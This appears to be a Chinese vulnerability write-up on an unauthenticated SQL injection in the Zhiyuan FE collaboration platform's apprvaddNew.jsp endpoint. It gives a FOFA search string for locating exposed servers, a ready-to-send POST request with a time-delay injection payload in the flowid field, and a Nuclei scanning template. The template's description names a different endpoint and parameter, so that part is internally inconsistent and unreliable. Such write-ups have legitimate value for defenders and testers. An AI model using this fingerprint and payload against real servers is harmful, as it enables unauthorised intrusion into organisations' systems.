0x00 漏洞描述
致远互联FE协作办公平台是一款为企业提供全方位协同办公解决方案的产品。 在受影响的版本中,攻击者可以未授权访问/witapprovemanage/apprvaddNew.jsp接口,利用 flowid 参数的缺乏校验,通过传入恶意的 SQL 语句进行命令注入,从而控制服务器。
影响范围
尚不明确
0x01 测绘工具
FOFA:body=“li_plugins_download”
0x02 漏洞复现
代码语言:javascript复制POST /witapprovemanage/apprvaddNew.jsp HTTP/1.1
Host: x.x.x.x
User-Agent:Mozilla/5.0 (WindowsNT10.0;Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko)Chrome/96.0.4664.93Safari/537.36
Content-Type:application/x-www-form-urlencoded
flowid=1';WAITFOR DELAY '0:0:5'--
0x03 Nuclei检测脚本
代码语言:javascript复制id: 致远互联FE协作办公平台 apprvaddNew.jsp SQL注入
info:
name: 致远互联FE协作办公平台 apprvaddNew.jsp SQL注入
author: admin
severity: high
description: 在受影响的版本中,攻击者可以通过未授权访问 /ncchr/pm/obj/queryPsnInfo 接口,利用 staffid 参数的缺乏校验,通过传入恶意的 SQL 语句进行命令注入,从而控制服务器。
requests:
- method: POST
path:
- "{{BaseURL}}/witapprovemanage/apprvaddNew.jsp"
headers:
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
body: |
flowid=1';WAITFOR DELAY '0:0:5'--
matchers:
- type: word
words:
- "SQL" # Adjust this based on known error messages if applicable
- type: dsl
dsl:
- "response.time > 5000" # Check if the response time is greater than 5 seconds
0x04 修复建议
关闭互联网暴露面或接口设置访问权限 升级至安全版本
0x05 免责声明
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。 请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。 作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。